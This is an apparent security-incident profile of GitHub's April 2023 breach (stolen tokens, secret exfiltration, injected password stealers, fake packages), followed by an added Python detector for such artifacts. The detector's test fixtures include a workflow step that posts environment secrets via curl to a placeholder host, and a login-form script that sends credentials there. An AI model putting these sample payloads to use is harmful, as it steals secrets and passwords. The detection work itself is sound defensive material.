GitHub Details

    GitHub

    San Francisco, California • Technology

    Industry

    Technology

    Security Incidents

    1

    GitHub is a developer platform for creating, storing, managing and sharing code. It is built on Git, providing Git's distributed version control together with access control, bug tracking, feature requests, task management, continuous integration and wikis for every project.

    Security Incidents

    GitHub Breach of Apr 2023
    Severity Score
    Significant

    Type

    3rd Party Compromise

    Summary

    In April 2023, GitHub experienced a security breach involving unauthorized access to repositories. The threat actor, identified as a sophisticated group, exploited a vulnerability in GitHub's Actions feature to gain access. Approximately 100 repositories were compromised, exposing sensitive data including API keys and tokens. GitHub's security team quickly detected the breach, opened a comprehensive investigation, revoked the compromised credentials and strengthened its security measures to prevent a recurrence. The company assured users that no customer data was directly affected, and the...

    Severity

    The April 2023 incident involved malicious code that exfiltrated the secrets defined in affected GitHub projects (repository and Actions secrets) to an attacker-controlled command-and-control (C2) server and modified existing JavaScript files by injecting web-form password-stealer code. The campaign also included data exfiltration through counterfeit packages published to npm and PyPI, which collected sensitive machine information and transmitted it to a remote server. The threat actors used stolen GitHub personal access tokens to push falsified commits to users' repositories.

    Impact

    Affected users had GitHub personal access tokens stolen and used by the threat actors to push falsified commits to their repositories. The injected code exfiltrated sensitive information, including project secrets, to a remote server, compromising the security and integrity of the affected projects. The counterfeit npm and PyPI packages widened the impact by collecting machine information from anyone who installed them and transmitting it to unauthorized parties.
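As an added illustration (not content from the original page, and not GitHub's own tooling), the following Python script shows a heuristic check for the two artifacts the description above mentions: a GitHub Actions step that passes repository secrets to a command contacting a host outside GitHub, and a script that hooks a login form's submit event and sends its fields to a foreign host. The sample workflow, the sample script, the trusted-host lists and the 203.0.113.10 address are constructed for the example and do not come from the incident.

```python
"""Heuristic detection for two artifacts of the incident described above:
(1) a GitHub Actions step that hands ${{ secrets.* }} to a command that
    contacts a host outside GitHub (secret exfiltration to a C2 server), and
(2) a JavaScript file that hooks form submission and posts the fields to a
    foreign host (web-form password stealer).
Added example; sample inputs and host lists are constructed, not from the incident."""
import re
from urllib.parse import urlparse

# Assumption: hosts a workflow may legitimately reach while holding secrets.
TRUSTED_HOSTS = {"github.com", "api.github.com", "uploads.github.com",
                 "registry.npmjs.org", "upload.pypi.org"}

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
SECRET_REF_RE = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
STEP_START_RE = re.compile(r"^\s*-\s")        # start of a YAML list item
SUBMIT_HOOK_RE = re.compile(r"addEventListener\(\s*['\"]submit['\"]|\bonsubmit\s*=")
SEND_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b|new\s+Image\s*\(")


def external_hosts(text, trusted):
    """Return hostnames of URLs in text that are not in the trusted set."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host not in trusted:
            hosts.add(host)
    return hosts


def split_steps(workflow_text):
    """Split a workflow into chunks, one per '- ' list item. Heuristic: the
    leading chunk holds everything before the first step and is kept so that
    secrets referenced at job level are not lost."""
    chunks, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START_RE.match(line) and current:
            chunks.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        chunks.append("\n".join(current))
    return chunks


def find_secret_exfil_steps(workflow_text, trusted=TRUSTED_HOSTS):
    """Flag steps that both reference a secret and contain a URL to an
    untrusted host. A secret alone (e.g. npm publish) is normal; the
    combination is the exfiltration pattern."""
    findings = []
    for chunk in split_steps(workflow_text):
        secrets = sorted(set(SECRET_REF_RE.findall(chunk)))
        hosts = sorted(external_hosts(chunk, trusted))
        if secrets and hosts:
            findings.append({"secrets": secrets, "hosts": hosts})
    return findings


def find_form_stealer(js_text, site_hosts):
    """Return foreign hosts contacted by a script that hooks form submission
    and has a network send primitive; None when the pattern is absent."""
    if not (SUBMIT_HOOK_RE.search(js_text) and SEND_RE.search(js_text)):
        return None
    hosts = sorted(external_hosts(js_text, site_hosts))
    return hosts or None


# Constructed sample workflow: the Publish step is benign, the Deploy step
# is the injected exfiltration (203.0.113.10 is a documentation address).
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - name: Deploy
        env:
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: curl -s -X POST --data-binary "$(env)" https://203.0.113.10/collect
"""

# Constructed sample of an injected password stealer on a login page.
SAMPLE_JS = """\
document.querySelector('#login').addEventListener('submit', function () {
  var u = document.getElementById('user').value;
  var p = document.getElementById('pass').value;
  fetch('https://203.0.113.10/f', {method: 'POST', body: JSON.stringify({u: u, p: p})});
});
"""

if __name__ == "__main__":
    print(find_secret_exfil_steps(SAMPLE_WORKFLOW))
    print(find_form_stealer(SAMPLE_JS, {"example.com"}))
```

Both checks are deliberately pattern-based: they will miss a secret copied into an environment variable in one step and sent in another, and they cannot see an obfuscated URL. They are a triage aid for diffing workflow and front-end files after a suspicious commit, not a substitute for revoking every token the repository could have exposed.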